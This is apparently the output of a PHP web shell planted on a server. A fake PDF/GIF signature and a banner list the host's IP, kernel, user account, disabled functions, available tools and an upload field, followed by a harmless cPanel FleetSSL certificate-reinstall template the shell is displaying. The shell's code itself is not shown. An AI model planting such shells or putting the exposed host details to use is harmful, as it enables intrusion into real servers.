%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.252 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /opt/fleetssl-cpanel/ |
Upload File : |
<style> .twell { border: 1px solid #e3e3e3; background-color: #f5f5f5; padding: 9px; border-radius: 3px; margin-bottom: 20px; } label { font-weight: normal; } </style> <p>{{TF `Reinstall certificate for: <strong>%s</strong>` .Domain }} </p> {{with .AltNames}} <p>{{TS `This certificate also includes the following alternative names:`}}</p> <ul> {{range .}} <li>{{.}}</li> {{end}} </ul> {{else}} <p>{{TS `This certificate has no alternative names.`}}</p> {{end}} <form method="post" onsubmit="return LetsEncrypt_DisableButtons()"> <div class="twell"> <p> {{TS `Alternate Chain Selection`}} </p> <p>{{TS `You may choose an alternate chain when re-installing the certificate. This can be useful to prioritize compatibility with certain classes of devices. This choice will be remembered for renewal. See <a href="https://cpanel.fleetssl.com/docs/for-users/alternate-chains/" target="_blank" rel="noopen noreferrer">here</a> for more info.</a>`}}</p> <select name="preferred_issuer" style="display:block;"> {{ range $issuer := .AlternateChains }} <option value="{{ $issuer }}" {{ if eq $issuer $.PreferredIssuer }} selected {{ end }} >{{ $issuer }} {{ if eq $issuer $.PreferredIssuer }} (Currently preferred issuer) {{ end }}</option> {{ end }} <option value="" {{ if eq "" $.PreferredIssuer }} selected {{ end }}>(Use server default)</option> </select> </div> <p>{{TS `It may take a couple of minutes for the webserver to reload after performing the reinstallation.`}}</p> <input type="submit" class="btn btn-primary" value="{{TS `Reinstall`}}"> </form> <div class="return-link"> <a id="lnkReturn" href="?"> <span class="glyphicon glyphicon-circle-arrow-left"></span> {{TS `Go Back`}} </a> </div>